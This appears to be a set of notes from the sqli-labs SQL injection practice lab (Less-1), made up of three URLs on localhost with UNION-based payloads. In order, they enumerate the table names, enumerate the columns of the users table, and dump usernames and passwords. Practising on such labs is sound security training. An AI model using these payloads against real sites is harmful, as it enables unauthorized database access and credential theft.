1 | http://localhost/sqli-labs/Less-1/index.php?id=a' union select 1,2,GROUP_CONCAT(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA=database() --+ |
1 | http://localhost/sqli-labs/Less-1/index.php?id=a' union select 1,2,GROUP_CONCAT(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' --+ |
1 | http://localhost/sqli-labs/Less-1/index.php?id=a' union select 1,2,GROUP_CONCAT(username,"-",password) from users --+ |